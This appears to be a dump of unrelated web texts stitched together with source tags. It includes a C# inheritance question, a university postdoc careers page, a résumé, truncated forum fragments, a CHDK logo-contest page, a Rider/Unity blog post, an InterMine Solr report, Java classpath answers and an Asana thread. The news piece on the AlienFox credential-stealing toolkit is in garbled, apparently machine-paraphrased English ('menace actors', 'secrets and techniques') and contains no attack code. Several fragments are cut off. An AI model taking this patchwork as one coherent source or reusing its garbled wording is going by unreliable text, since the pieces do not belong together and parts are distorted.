What design pattern to use when you need derived class field values but you only have base class field variables? Consider the following code: abstract class Player{ abstract Stats getStats(); } abstract class RangedPlayer:Player{ RangedStats rangedStats; override Stats getStats() {return rangedStats;} } abstract class MeleePlayer:Player{ MeleeStats meleeStats; override Stats getStats() {return meleeStats;} } class Stats{ int maxHealth; } class RangedStats:Stats{ int maxAmmo; } class MeleeStats:Stats{ int meleeComboLength; } abstract class ThingPlayersCando{ Player player; abstract void doThing(); } class ThingMeleePlayersCando: ThingPlayersCando{ abstract void doThing(){ //getMeleeComboLength from base player class? } } class ThingRangedPlayersCando: ThingPlayersCando{ abstract void doThing(){ //maxAmmo from base player class? } } Here I made ThingMeleePlayersCanDo and ThingRangedPlayersCando both inherit from ThingPlayersCando because sometimes accessing the Player class is useful for both. But sometimes I may also want to access only things available to Melee or RangedStats. The shared interface/abstract class is necessary because I want to call doThing() without needing to care about the type. The getStats() in player class is necessary because somethings only need to know stuff shared by all players(e.g maxHP) I thought of the following fixes: Just cast stats to appropriate type. Do away with Ranged and Melee Stats and put all fields in single Stats class. Simplest and it's not like having more data fields is going to hurt. Player stats is a dictionary/hashmap. Ugly. Pass in RangedStats/RangedPlayer in ThingRangedPlayersCanDo constructor. Same for melee. Is there a design pattern that can solve this issue in a better way? Do the same thing with Stats as for the other classes class Stats { abstract int getStats(); } this way you can access the stats without knowing which specilized class they are @MarcoBeninca The problem is that MeleePlayerStats and RangedPlayerStats shouldn't share those fields. So the implemented get functions in those classes would return meaningless values. What design pattern to use when you need derived class field values but you only have base class field variables? You can create instance of class that have desired values. But sometimes I may also want to access only things available to Melee or RangedStats. You can create an instance of Ranged stats: RangedStats rangedStats = new RangedStats(); int health = rangedStats.maxHealth; And IntelliSense will show you only its available methods and parameters: I've edited your code because it does not compile: abstract class Player { public abstract Stats GetStats(); } abstract class RangedPlayer : Player { RangedStats rangedStats; public override Stats GetStats() { return rangedStats; } } abstract class MeleePlayer : Player { MeleeStats meleeStats; public override Stats GetStats() { return meleeStats; } } class Stats { int maxHealth; } class RangedStats : Stats { int maxAmmo; } class MeleeStats : Stats { int meleeComboLength; } and other classes: abstract class ThingPlayersCando { Player player; public abstract void DoThing(); } class ThingMeleePlayersCando : ThingPlayersCando { public override void DoThing() { throw new NotImplementedException(); } } class ThingRangedPlayersCando : ThingPlayersCando public void OnlyMyMethod() { } public override void DoThing() { throw new NotImplementedException(); } }
STACK_EXCHANGE
Career Services works with the following postdoctoral fellows: - Current Biomedical postdocs in Biomedical Postdoctoral Programs - Current postdocs in Graduate Division of Arts and Sciences - Current postdocs in the School of Engineering and Applied Science - Note: We are not able to see research associates or former postdocs, unless they are also Penn alumni/ae. We have developed career-related resources and programs that are equally applicable to PhD students and postdocs, and you can find more information about these on the Grad/postdoc homepage. Whether you are thinking about doing a postdoc or are currently a postdoc at Penn, we have a range of resources on this page to help you with your career decisions making. - Thinking about doing a postdoc? Jump to information on finding opportunities and what to be thinking about - Already a postdoc? Make the most of your time by reviewing some of these resources Applying for Postdocs Advice for applying for an NRSA General advice from former postdoc Postdoc position openings portal (STEM fields) Postdoc opportunities in the social sciences and humanities (organized by upcoming deadlines) Questions that can be asked when narrowing down possible postdoc opportunities: To current lab members: |What is the best and worst thing about being in this lab?| If you could change one thing about the PI, what would it be? If you could change one thing about the lab, what would it be? What is the leadership/management style of the PI? Do people in the lab get along? To the PI: |How do you run the lab? Do you allow your postdocs independence? How often do you meet with postdocs? | In how many collaborations is the lab involved? Are postdocs expected to write grants for themselves? When would you expect me to write my first grant (the first year)? If I do not get my own funding, do you have enough funding to cover me for x years? What exactly is your funding situation (# grants, source, subject, etc.)? Can I help write your grants? Can I help TA/teach your classes? (if you want teaching experience) Do you have contacts in both academia and industry? Do people get along in your lab? To former grad students/postdocs from the lab: What was the lab environment like? Advice from former postdocs During your time at Penn you can use our services whenever you need them. We encourage you to: - Attend our events for new students to get information on how to make the most of our resources. - Join us for workshops on a wide range of topics, from resumes and interviewing to offer negotiation and networking. - Schedule a mock interview with career advisors to get feedback on your interview style and technique. - Drop by for walk-ins to get answers from a career advisor for your quick questions. - Set up an appointment to get your resume/CV and other job search materials reviewed and critiqued. - Visit the funding resources section of our website to see what opportunities exist for your academic program. - Participate in discussion panels on applying for academic jobs, and meet faculty who have been successful. - Attend panel discussions on non-academic career options and take the opportunity to network with the speakers. - Make use of our career planning resources as you consider your options during your degree program and after you are done. Making the most of your postdoc The Role of Postdocs, PIs and Institutions in Training Future Scientists - Advice from a Penn postdoc on having a successful postdoc experience
OPCFW_CODE
I'm a published photographer. Six weeks of taking pictures, thousands of miles later, hours of editing and I'm a published photographer. Out running forest fires, barely missing deer at night and the occasional fallen tree blocking all exits only made the experience more memorable. Thank you to my friend Barbara Keck who invited me along on her quest to write the ultimate guide to the people and the wineries of the Sierra Foothills. This book consists of personal stories, family recipes and a complete directory of the 10 counties of the California Sierra Foothills. Yes, I did build the website. Check it out and buy the book at Wineries Of The Sierra Foothills. Teaching Introduction to Web Development at LaGuardia Community College Shopify is the solution recommended by my friends at Baron Fig when I was researching an ecommerce solution for Wineries of the Sierra Foothills. It's a hosted solution that gives you extraordinary control over the both the look and functionality of your site. With their templating language, you have complete control over the design of the site. Their API and webhooks allow you integrate with a variety of third-party services and let you build your own. You get all the benefits of a hosted solution plus the control of having your own hosted site. Check out my demo shop in progress using Bootstrap as the base. - Web Development - Puppy nanny - Over 7 years of web application development experience. - Ecommerce development on a multi-million dollar website. - Network and server administration experience. - Comfortable with front-end and back-end development. - Zend Framework Certified. - Java SE 7 Programmer Certification. - Server Administration - Linux, Mac OS X, Windows - Database Engines - MySQL, PostgreSQL, MS SQL Server, MongoDB - Web Toolsets - jQuery, Symfony, CakePHP, Zend Framework , Drupal, CodeIgniter - Development Tools - Eclipse, Netbeans, BBedit, Ant, XDebug, Doxygen, Subversion, Git - PHPUnit, Selenium, Jenkins Web Instructor, Laguardia Community College Developed a curriculum which gives students an introduction of web development principles and teaches them basic HTML, CSS, along with commonly used frameworks and design principles. - Setup Moodle as an online learning repository - Schedule industry people to come and talk to students about opportunities and challenges in web development - Help students with personal projects Senior Web Developer, Experian Developed and maintained custom email marketing solution front-end that was integrated into main Cheetahmail platform. API support for Amazon web services including S3, CDN services. Additional work included working with Adobe Omniture APIs. - Setup Gerrit for code review with remote team. - Provided basic API layer to integrate 3rd parties into main email system. - Worked with Google on email with Adwords integration. - Worked with 3rd party vendor on an extensive security review and fixes to system. Web Application Developer, CNBC Convert Microsoft provided content management solution to PHP based solution. Worked on architecture and implementation of content management solution and public website. Combination of Drupal and Zend Framework libraries. Used Smarty for public website templates. Implemented Gearmand for API based backend for processing background jobs. Web Application Developer, Rent The Runway Drupal based ecommerce site. Modules written include customized CDN module using ImageCache, Authorize.net checkout module using their credit card storage service and a custom product reviews module. Also used Drupal services to provide backend support for an iPhone app. Implemented version control and basic unit testing. Integrated Facebook into the site using the PHP client. Used Bronto for our email communications through Drupal. Built API integration with Authorize.net for credit card processing and secure credit card storage. - Custom review system for users to rate the dresses they have rented. - Implemented Subversion for version control and managed roll-outs. - Created a BIRT server for sales reporting. - Implemented functional testing using PHPUnit, Selenium and Hudson. - Initiated Symfony project for testing converting site to MVC. Web Developer, NightAgency Build interactive sites for a variety of clients including Hanes, Soft Scrub and Purex. Majority of development is done using PHP. Frameworks included CakePHP and Zend Framework. Work with online services such as Amazon S3 for storage. Rapid development environment for clients with strict deadlines for product launches. Built a localized web site with both French and English versions for the Canadian site using a single code base. Used AMF to communicate between Flash client and back-end server. Amazon S3 used for image storage. Integrated Disney custom swear filter using SOAP to filter submissions.
OPCFW_CODE
What app will keep my typing in a file that I can access if I am timed out. This happens to me when using web forms and when typing iTunes comments. I do "Select All" then "Copy" as I go but sometimes that last 150 words dissappear when I click the "Submit Button". Thanks for your suggestions, Earl Williams, Surrey, British Columbia PS. I have Copy/Paste is it tracking paragraphs or just listing vocab? RadioDays <email@example.com> wrote: > What app will keep my typing in a file that I can access if I am timed > out. This happens to me when using web forms and when typing iTunes > comments. I do "Select All" then "Copy" as I go but sometimes that > last 150 words dissappear when I click the "Submit Button". Thanks > for your suggestions, Earl Williams, Surrey, British Columbia PS. I > have Copy/Paste is it tracking paragraphs or just listing vocab? "Harry?" Ron's voice was a mere whisper. "Do you smell something ... burning?" - Harry Potter and the Odor of the Phoenix Converting numeric data type to text data type Hi, I would like to convert a dollar amount ($1,500) to represent Fifteen hundred dollars and 00/100 cents only for SQL reporting purposes. Is this possible and can I incorporate the statement into an existing left outer join query. Thanks in advance, [posted and mailed, please reply in news] Gavin (firstname.lastname@example.org) writes: > I would like to convert a dollar amount ($1,500) to represent Fifteen > hundred dollars and 00/100 cents only for SQL reporting purposes. Is > this possible and can I incorporate the statement into an existing > left outer join query. If it is for r... Switich Input field from TYPE=TEXT to TYPE=PASSWORD Hi everyone, I have a page with a login box. Because of lack of space, instead of labels I put the descriptive text in the input fields (so username input says 'username', and password input says 'password'). The password field however, once it does have the focus, it should mask its input. Now what I've done, and works in firefox, is onfocus="this.type='password'; this.value='';". (Its a bit more complex than that, but this is essentially it). Unfortunatly IE complains. Is there any way to perform this trick in IE without showing and hidin... Joining Text Type with Memo Type = Funny Characters Hi, when i am joining on a Column of Text Type with one of Memo type the resulting entry has funny chinese characters! Has anyone else encountered this before? Is there a cure?? Funny characters and Chinese characters are completely different I have no idea what "Memo Type" is, but did you check the keyboard language property on the control? > when i am joining on a Column of Text Type with one of Memo type > the resulting entry has funny chinese characters! > Has anyone else encountered this before? Script to change from type=password to type=text, minor bug repair My form has a password field, and I was wanting to show a text value by default, then when the visitor clicks on it let it change to a I must confess that this was over my head, so I searched online and found a freebie script. I had to make some modifications to the original to work out a few bugs, but I'm having one bug that I can't If you click on the field, it blanks the value just fine. And when you click away while leaving the field empty, then it plugs the word " Password" back in just fine, too. But then when you click back into Checking a form input tag type works only for type text... not others... why? I have a form called "ourTestForm". Its a test form - nothing special - it contains five input tags - they are named one, two, three, four and five. The input tags are of type text,text,radio,checkbox and select. When I run the following code, it correctly reports "text" (for input tag named "one") but it reports (alerts) input tag four as being "undefined". The same happens for any input tag that is not of type "text". How come? How can I fix it? I get type mismatch errors sometimes. Why does Access think it knows what data type a text box control is? Runtime error 13 - type mismatch. I get the above error when I create a text box control on a form named [UserID] and I run the following code in a sub on that same form... If DLookup("[UserID]", "tblUsers", "[UserID]=Forms!Form10!UserID") tblUsers has a 6-char text field in it named [UserID]. What can Access be thinking to tell me the data in the textbox and the data in the table field cannot be compared because of incompatible data types? This has always bugged me about Access. I believe it should be possible to compare the string in Forms!Form10!UserID ... app type ? Can I somehow get a listing of the applications on my disk, classified In article <email@example.com>, Philo D > Can I somehow get a listing of the applications on my disk, classified > Application (Intel) > Application (PowerPC) > Application (Universal) Answering my own question: System Profiler > Software > Applications, sort by "Kind" column In <firstname.lastname@example.org>, Ph... Replace text in text box with innerhtml type thing Currently, I am having a problem replacing the value of a input box with something else using the innerHTML thing. Right now I have and a link with and the text box like <INPUT TYPE="TEXT" NAME="WHATEVER" id="WHATEVER" VALUE="TESTING" and I am tryi... Changing table cell between plain text and INPUT TYPE=TEXT control I'd like to setup a table cell such that the contents displays as plain text until the mouse hovers over the cell, and then it changes to an INPUT TYPE=TEXT control, so I can edit the content. achieve this, but before I start, is there any overarching reason why this wouldn't work? I anticipate placing the plain text and the input area in separate DIVs, and making the appear alternately, depending on where the mouse pointer is. The page is for my own use, and perhaps one or two colleagues, so we
OPCFW_CODE
I've got couple of sketches for a logo on my table, but had no time to get back to them... will happen this year - promise! (writing at 2am...) Update (2007-11-17 c.e.): Rumor has it that some people are getting antsy for this logo contest to end. :-) To tell the truth, I was hoping there'd be lots more of you graphic-artists out there just chomping at the bit to marvel us with your stunning submissions. Like five entries is not a huge number of them, ya know? I like some of the ideas so far but I don't think I'm the one to vote on it and choose, and I'm not sure how to hold an open vote by all contributors/viewers. I kind of thought that since CHDK is GrAnd's main effort (and even his suggestion to get some logo submissions), he might be the one to finally say, "I like that one! I'll use it." Or, "Screw them all! My original one is still best!" :-) (plus I don't know how to change the logo and I probably don't have the user permits for it) So .... I'm kinda thinking that ... maybe this page should just stay up and let it run? Then there's always a place for people to submit possible logos. That way if at any time GrAnd likes one of them, he can just go ahead and grab one. Or swap it out for another if something else catches his eye? Maybe a link titled "Logo Submissions" could just be added to the Feedback section on the main page and the "contest" in the News section finally moved off. Then anytime someone could submit a new idea. One will eventually stick. Even Coke changed their logo over the years. Surely we have at least that much freedom. :-) Have not been here for a while - so I was quite astonished (and honoured of course) to see my (draft of a) logo made it to the top of the page (and at least to two fora.) Since I was asked: I explicitly permit the use of the unaltered logo(s) for every non-commercial purpose concerning CHDK. Feel free to suggest improvements or modifications. [cosmograph] - Well, maybe it's just my monitor, the dark grays to black on it are stronlgy bunched up on that end. Making it very difficult to see the words on the dark-gray dial. Might be nice if the letters on the CHDK dial were more legible. And as you can see, I always like purty colors on the ones I sent for examples. :-) I did borrow your logo today and brightened it up some just to see what would happen, but didn't take the time to upload them. (one of course has lots of purty colors on it. I know, uck) - Congrats on winning btw! But don't get too comfortable on that throne, I might finally come up with something by spring that I think is worth sending as an official submission. :-) [mr. anon] As suggested two brighter versions: - I'd like to see the picture even more brighter. Because the current variant looks good on LCD monitors with (S)IPS panels, but is still hardly readable on PVA/MVA panels due to these panels less readable in dark colors. As I do not have the original image I've tried to change your one by raising brightness of the dial area (so, the quality is little bit degraded): - [--GrAnd 07:01, 30 November 2007 (UTC)] - Ah, that's MUCH more better! Thanks! Looks nice here! - But I had a momentary lapse of I need lotsa colors, so I came up with this'n, playing off of your camera-dial idea (again). ... :) - I know, I know, you folks are crazy about that red and black/gray stuff, so I at least made the main logo letters in those colors. :) It might look a little tacky compared to yours, but if anyone wants to expound on this, I saved the bare-bones vectors in a file so I can flip colors and bevels and things around. (And I wanted to figure out how to use all those cool layout tools I've never used before. :) Okay, I'll quit butting in after this, I promise. :X GrAnd suggested that people submit some ideas for logos, the only requirement is they have to fit a 266x75 format for Wikia's Quartz skin, or 135x155 for all other skins, 155x155 may be used but not recommended (* see GrAnd's note below). It's probably good to also keep them limited to a PNG filetype so you can upload them to the Wikia and make them easier to view and use. Share them here or in the discussion section (link above). Some samples were posted there for a starter. Anyway, I was fooling around with my PL32 editor and came up with this. It's not really good. As I said I was just fooling around playing with some of PL32's editing tools. But I thought it might act as an example for others, maybe of what NOT to do. :-) I thought taking elements from different parts of CHDK features might be made into one somehow. Surely this can inspire anyone to do better. :-) This one covered the on-screen-display elements like the histograms (OSD), scripting (motion detection and intervalometer lightning photography), the fun of the built-in games, and the customizable Grid feature. (hmm... when uploading wikia thew some pixels in new places, oh well, it's just an example) - Actually, wiki uses two different logos depending on skin used. :) From wiki-help: - The logo for the Quartz skin has to be no more than 266 pixels wide and 75 pixels tall, and should be saved in the .png format. - The logo size for all other skins has to be no more than 135 pixels wide and 155 pixels tall, and should be saved in the .png format. - But, the second one can be 155x155, although 135x155 is recommended. --GrAnd 07:02, 17 October 2007 (UTC) - Thanks for the clarification GrAnd, It helps to give folks a few more formats to fit their layout into. I'll leave mine as-is and re-do it if ever needed, but it's just an example. :-) [mr. anon] Tried to visualize CHDK as enhancement of a jog-dial resembling the orginal one. - Hmm... I like this idea! But I think it might be nicer if CHDK was a little logo right on the dial, maybe even shown at an odd angle so it's not obvious at first, then with one of those image-insert blowups like in a user manual, pointing to it and showing it enlarged. You might like to have it be CHDK (+RAW), since RAW is such a small subset of its many functions. RAW just don't tell the story and so many other cameras already have RAW, missing the impact of how special it is. CHDK is more like having a whole extra dial on the camera. :-) I like the concept though. This is the problem I had, trying to convey all that's in CHDK in a simple logo. I almost thought of using a swiss-army knife theme. With each blade, corkscrew, scissors, etc. labeled for one of its functions. Then I was back to "too complex" for a simple and easy to recognize logo. Anyway, nice idea! Too bad a logo can't be an animated GIF or SWF, then we could have it like a transformers-cartoon animation, a simple camera falling into bits and reassembling itself into some mighty super-robot camera. We'll eventually need a CHDK super-hero character out of this, he comes along and saves us from all those paltry camera-company offerings. :-) [mr. anon] Second version without any visual reference to the features of CHDK.(I fully agree that CHDK is more than RAW). - Hmm... I remember seeing an earlier one, where you did 2 dials, one with CHDK's features listed on it. I think I liked that better, but was going to suggest making the dial-sectors of CHDK's options into brighter colors, and making the original camera's mode-dial the dim one. I'm not the one that's going to be voting on these things, but I did like that concept better. What if you did the above, but just with CHDK features listed in colorful sectors? Forget about the camera's mode-dial options. It's been REPLACED!! :-) - [mr. anon] combination of a typical canon and the text, just n idea, no time to try different fonts http://free.pages.at/panther06/chdk-logo22-s.jpg So I decided to give something back. I actually made three but this one I like the most.
OPCFW_CODE
A brand new modular toolkit known as ‘AlienFox’ permits menace actors to scan for misconfigured servers to steal authentication secrets and techniques and credentials for cloud-based electronic mail companies. The toolkit is bought to cybercriminals through a personal Telegram channel, which has change into a typical funnel for transactions amongst malware authors and hackers. Researchers at SentinelLabs who analyzed AlienFox report that the toolset targets frequent misconfigurations in fashionable companies like on-line internet hosting frameworks, comparable to Laravel, Drupal, Joomla, Magento, Opencart, Prestashop, and WordPress. The analysts have recognized three variations of AlienFox, indicating that the writer of the toolkit is actively growing and bettering the malicious instrument. AlienFox targets your secrets and techniques AlienFox is a modular toolset comprising varied customized instruments and modified open-source utilities created by completely different authors. Risk actors use AlienFox to gather lists of misconfigured cloud endpoints from safety scanning platforms like LeakIX and SecurityTrails. Then, AlienFox makes use of data-extraction scripts to look the misconfigured servers for delicate configuration recordsdata generally used to retailer secrets and techniques, comparable to API keys, account credentials, and authentication tokens. The focused secrets and techniques are for cloud-based electronic mail platforms, together with 1and1, AWS, Bluemail, Exotel, Google Workspace, Mailgun, Mandrill, Nexmo, Office365, OneSignal, Plivo, Sendgrid, Sendinblue, Sparkpostmail, Tokbox, Twilio, Zimbra, and Zoho. The toolkit additionally consists of separate scripts to ascertain persistence and escalate privileges on susceptible servers. An evolving toolset SentinelLabs stories that the earliest model discovered within the wild is AlienFox v2, which focuses on internet server configuration and surroundings file extraction. Subsequent, the malware parses the recordsdata for credentials and exams them on the focused server, making an attempt to SSH utilizing the Paramiko Python library. AlienFox v2 additionally comprises a script (awses.py) that automates sending and receiving messages on AWS SES (Easy E mail Providers) and applies elevated privilege persistence to the menace actor’s AWS account. Lastly, the second model of AlienFox options an exploit for CVE-2022-31279, a deserialization vulnerability on Laravel PHP Framework. AlienFox v3 introduced an automatic key and secret extraction from Laravel environments, whereas stolen knowledge now featured tags indicating the harvesting methodology used. Most notably, the third model of the package launched higher efficiency, now that includes initialization variables, Python courses with modular features, and course of threading. The latest model of AlienFox is v4, which options higher code and script group and focusing on scope growth. Extra particularly, the fourth model of the malware has added WordPress, Joomla, Drupal, Prestashop, Magento, and Opencart focusing on, an Amazon.com retail website account checker, and an automatic cryptocurrency pockets seed cracker for Bitcoin and Ethereum. The brand new “pockets cracking” scripts point out that the developer of AlienFox desires to increase the clientele for the toolset or enrich its capabilities to safe subscription renewals from current clients. To guard in opposition to this evolving menace, admins should be certain that their server configuration is ready with the right entry controls, file permissions, and removing of pointless companies. Moreover, implementing MFA (multi-factor authentication) and monitoring for any uncommon or suspicious exercise on accounts can assist cease intrusions early.
OPCFW_CODE
Integrating Rider 2018.2 and the Unity Editor Rider 2018.1 introduced deep integration with the Unity Editor, allowing you to run unit tests, view Unity console log entries and control play mode, all without leaving Rider. In our third post looking at Rider 2018.2 and Unity, we’ll look at what’s new in Editor integration. In this series: - Unity Package Explorer - Assembly Definition Files - Unity Editor integration updates - Unity specific code analysis Installation and first use The easiest way to get started with Rider and Unity is to load an existing solution, at which point we’ll automatically install a plugin into your Unity project. When you switch back to Unity, the plugin initialises, sets Rider as the default external editor and you’re all set. The plugin makes sure the generated C# projects are compatible with Rider, and will set up the inter-process communication that lets Rider run tests, view logs and so on. But there’s a little bit of a chicken and egg scenario here. What happens when there aren’t any solution files? Unity generates these files, and makes sure they’re up to date when you double click a C# file. But they’re not usually checked into source control. So how do you open a project without solution files? Of course, once Rider is set as the default external editor in Unity, you can double click a C# file and Unity will open Rider for you. But we also received feedback that users were trying to open a Unity project using Rider’s Open Folder feature. This is mostly intended for working with web files, and not C# projects, which require MSBuild files. Without important context from project files (e.g. target framework version, references, etc.) Rider can’t show the C# features we all know and love, such as code completion or inspections, and this was understandably leaving users frustrated. The good news is that we’ve addressed this in Rider 2018.2! If you try and open a fresh Unity project as a folder, Rider will now notify you that Unity and C# functionality is unavailable until the project is reopened correctly. It will also prompt you to install the plugin. Once you’ve clicked the action link, Rider will install the plugin and then prompt you to switch back to Unity, at which point Unity will load the plugin, set the default external editor and generate the project files. You can now reload the solution correctly. (Of course, you can also set Rider as the default external editor in Unity’s preferences – recent versions of Unity will recognise when Rider is installed and automatically add it to the list of available editors. Once selected, double clicking a C# file will generate the solution, open it in Rider, and then the plugin is automatically installed.) One of the cool features of Rider’s deep Unity integration is the ability to capture Unity’s Console log messages and bring them into Rider’s UI, with parsed, clickable stack traces. We’ve made a couple of nice updates in this release. Firstly, we’ve added a text filter. Just start typing in the search field at the bottom of the window, and we’ll narrow down the list by only show matching items. Hit enter to change focus to the list and navigate with the cursor keys. And if there are too many log entries? Well, you can now collapse similar items, using the toggle button in the toolbar. Once selected, Rider will only show a single item, with the number of merged items shown in brackets at the end of the message. And finally, we can now open editor and player log files in Rider’s editor. Simply open the options menu in the Unity log viewer tool window (the cog in the top right of the tool window) and select Open Unity Editor Log or Open Unity Editor Player Log. Note that these log files are the Unity editor’s own logs, or logs from a standalone player, rather than the messages logged to Unity’s Console. Working with class libraries With the advent of Assembly Definition Files, Unity now has a story for splitting a solution up into separate assemblies, with the architectural and build time advantages this gives. But we know that there are still a lot of Unity developers who create a separate solution for class libraries that are then added as binary references to a Unity project. Wouldn’t it be nice if all those lovely Unity project integration features were available to these class library projects? Well, now they are! If you have a class library project, with solution files living in the root of the Unity project (in the same location as the generated solution file), Rider will now enable the same rich integration features for class library projects. This means you’ll get the log viewer, the play/pause/step buttons to control Unity’s play mode, and also automatic Attach to Unity Editor and Attach to Unity Editor and Play run configurations, to make it very easy to attach the debugger to the Unity editor. And best of all, it will work even if you have the class library and the generated solutions open at the same time! Control when to reloading assemblies Unity is designed to have a tight feedback loop. Whenever a source file changes, the underlying assemblies are recompiled and reloaded. This works great for immediate feedback, but can be annoying when you’re in play mode – you’re busy play testing a scenario, and a modified file causes everything to reload and lose state. It can be very frustrating. Unity 2018.2 added an option in the General preferences page to control what happens when scripts change during play mode. We liked it so much, we’ve brought it to earlier versions of Unity. The Rider page in Unity’s preferences dialog will now allow you to prevent assembly reloads during play mode, or reschedule them for after play mode, or to stop play mode straight away and recompile. This is very useful when used together with Rider’s background refresh, which notifies Unity when a file has changed, causing a recompile. And you’ll also be pleased to hear that this release of Rider continues to fine tune the background refresh, making it a little less aggressive in when it causes a recompile. Even better, the implementation for the lock assemblies feature came from an external contribution (yes, the Unity support is open source and has up-for-grabs issues!). Congratulations and thanks to Jurjen Biewenga! 🎉 Those are the main new features for editor integration in Rider 2018.2, but that’s not everything. There are also a few more minor updates, although some are no less important. For example: - Rider now understands references added in csc.rsp files – Roslyn compiler response files. When generating the project files, Rider has previously looked for references and C# defines from mcs.rsp, smcs.rsp and gcms.rsp files and added them to the project file. This release adds similar support for csc.rsp files used by the latest C# compiler. - We’ve reduced the number of times that generated project files are written to disk. This means that we reload the project less frequently, and although Rider is very quick at reloading (and doesn’t prompt you!), doing no work at all is always faster! It also makes much more of a difference for projects using Unity packages, which can end up having tens or even over a hundred projects. - We’ve reduced the time taken when initialising the Unity plugin, to help improve that feedback cycle. We’ll be doing more work on this in coming releases. - And finally, we’ve fixed a few other bugs and exceptions (see the full list for 2018.2, 2018.2.1 and 2018.2.2), the most important of which was a nasty crash with older versions of Unity. Other highlights include once again correctly setting LangVersion on older version of Unity, disabling the plugin in batch mode, and no longer unnecessarily install the plugin every time you open a project. Sorry about that! As you can see, we’ve put a lot of effort into integrating Rider well with Unity, and we’re not done yet. In our next post, we’ll take a look at the new Unity specific inspections in Rider 2018.2. If you have any suggestions for other features you’d like to see in Rider, please let us know. And in the meantime, please download Rider 2018.2 today, and give it a go (and don’t forget about the 30 day trial version)! Subscribe to a monthly digest curated from the .NET Tools blog: Collection Expressions – Using C# 12 in Rider and ReSharper Welcome to our series, where we take a closer look at the C# 12 language features and how ReSharper and Rider make it easy for you to adopt them in your codebase. If you haven’t yet, download the latest .NET 8 SDK and update your project files! In this series, we are looking at: Primary Const… Generate Unit Tests Using AI Assistant Can you make your life easier as a developer by using AI to generate unit tests? AI can provide a bit of automation to this daily development activity and make our development workflow a bit smoother if we use it thoughtfully. So in this blog post, we’ll take a look at using the JetBrains AI Assista… Boost Code Quality with Qodana and GitHub Actions It’s been roughly half a year since we introduced Qodana to .NET in our blog post about how to elevate your C# code quality with Qodana. Since then, we’ve been quite busy! Qodana went out of preview and into GA. Furthermore, we greatly improved the integration with our IDEs, providing an effortless …
OPCFW_CODE
Currently InterMine uses Apache Lucene (v3.0.2) library to index the data and provide a key-word style search over all data. The goal of this project is to introduce Apache Solr in InterMine so that indexing and searching can happen even quicker. Unlike Lucene which is a library, Apache Solr is a separate server application which is similar to a database server. We setup and configure Solr (v.7.2.1) independently from the application. We use Solr clients to communicate between the application and the Solr instance. Here, SolrJ (v.7.2.1), a java client for solr is used to communicate between the InterMine and Solr. We also removed the bobo facet library which is used with Lucene since Solr itself provides faceted search. The implementations has been designed in a manner that InterMine would not be heavily coupled with Solr. When you want to change your search engine to something else in future, you just have make different implementations for the interfaces defined. Currently the search index and the autocomplete index processes use Solr to index the data. The index time has improved significantly with compared to previous indexing times. For example, currently FlyMine takes around around 1900 seconds (32 mins) to index the data. But with Solr we see that it takes only 1250 seconds (21 mins) which is 34% reduction in time. Query time has also improved with Solr where a query of “*:*” in FlyMine would take around 30-40 seconds which with Solr takes less than 1 second. Previously with Lucene, the indexed data has to be retrieved from the database during the first search after starting the webapp. This took some time but with Solr, it is not the case and the results are instantly returned. Addition to the above, two web services have been implemented. A Facet service has been implemented which will return only the facet counts for a particular query rather than returning all the results. The other web service is Facet List service which is similar to the previous one but it will return all the facets available in a mine. It will be useful when you want to know all the facets in a mine before you run an actual search. All these changes are made against InterMine 2.0 version. These changes will be included in an InterMine release in near future, but for those who want to try these changes immediately, can checkout this branch in Github and follow these instructions. All these changes are tested with Apache Solr (v7.2.1). - Github changes : https://github.com/intermine/intermine/commits/gradle-search?author=arunans23 - Setup document : https://docs.google.com/document/d/10B-MbzF5HIpJjkNp-UAICbhVkVJnjDD6CnkbcRYXxH4/edit?usp=sharing - Detailed technical doc: https://docs.google.com/document/d/1V1Hbm1o3nk3rOv3j7PLsk-EL9mDKyAD4NitwIDA1UGw/edit?usp=sharing
OPCFW_CODE
Run java application from command line with external jar files I have an external jar file(have package structure), which contains the main class, and I can run the app from command line like this: java -jar example.jar But I still have another test.class file outside this jar file, and some classes inside this jar file will invoke the methods in test.class. How can I specify the test.class file to be used by jar file in command line? Tried many ways, always show: NoClassDefFoundError for test.class NB: the test.class file also use class files in example.jar file, has its own package structure. I know I can put them together in one jar file, unfortunately I need separate the test.class file. Read up on Classpaths in the oracle tutorial. If the class is in bin directory : java -cp xxx.jar;bin pck1.pck2.MainClass If the class is in the current directory : java -cp xxx.jar;. pck1.pck2.MainClass and so on... More info in the manual, please read it at least one time... ;-) Sorry, not in workspace, no bin directory. Assume test.class file is in the same folder with example.jar file "Assume test.class file is in the same folder with example.jar file" How about you 'pick up the ball & run with it' rather than try to get us to code this to your exact specification? I think I forgot to mention one important thing: the test.class also use the class files in example.jar, and has its own package structure too...and you use ; to separate class path to search the class files? Seriously how hard is java.exe -? @Aubin I was asking LifeOnCodes lol. This question could have been summed up for him if he had just done java.exe -?. It works. I want to stress that the options -cp xxx.jar;. should come before the class containing the main method, otherwise the annoying "Error: Could not find or load main class" appears. In Linux System Compile and Run Java Program along with External JARs. javac -cp </path/jar1>:<path/jar2>:<path/jar3> MainClass.java If Compiler throws deprecation warning. You can recompile with -Xlint:deprecation argument. javac -Xlint:deprecation -cp </path/jar1>:<path/jar2>:<path/jar3> MainClass.java Finally, run the Java Program: java -cp </path/jar1>:<path/jar2>:<path/jar3>:. MainClass If you want to run Java Process in Background. You can use nohup. nohup java -cp </path/jar1>:<path/jar2>:<path/jar3>:. MainClass & You can use following commands to run java main class or java jar file: java -Djava.ext.dirs=E:\lib E:\Executable\MyMainClass java -Djava.ext.dirs=E:\lib E:\Executable\purging.jar
STACK_EXCHANGE
I just started using Asana and I was wondering how to organize workflow We have around 10 people in the team and not all of them are responsible for all the projects. Sometimes one project includes 2 members and over time needs another 2. How do you usually do it? Do you add a new team for a new project or do you create one big team of your company (10 people) and create projects within the team and invite particular team members to a specific project? It depends quite a bit on how many projects you intend to run. Your goal should probably be to keep things easy to find and try to find the sweet-spot between having enough teams so there aren’t far too many projects in each one. But at the same time, you don’t want 20 teams with 2 projects in each. Except for collaboration, I find the main purpose Teams to be structuring your projects. We’re a bit over a hundred and never create a new Team unless it’s a major initiative that requires 5 or more Projects to be created within the team. To visualize, I recommend just writing up some made-up teams and projects in a Sheet and try to see what a good combo could be. A bit of advice, though - it’s a lot easier to create new teams than having to remove old teams. That’s a great guide! Although I don’t personally fully agree with having so many teams in all organizations. We try to avoid any team only linked between people. Our vision is that any team should be connected to our organization elsewhere and things you’d might want a report on. Otherwise we try to manage one-on-ones and similar in the team where they belong, such as your department or, if cross-function, where it makes the most sense. We’ve scaled from 10 people to 130 in 3-4 years and the amount of teams created made a mess. As previously mentioned, I’d much rather expand on teams as they are needed instead of getting put in a situation where you have too many teams. I am happy to find this question because I have been wondering the same. While I appreciate your feedback, your context is more for in-house teams. 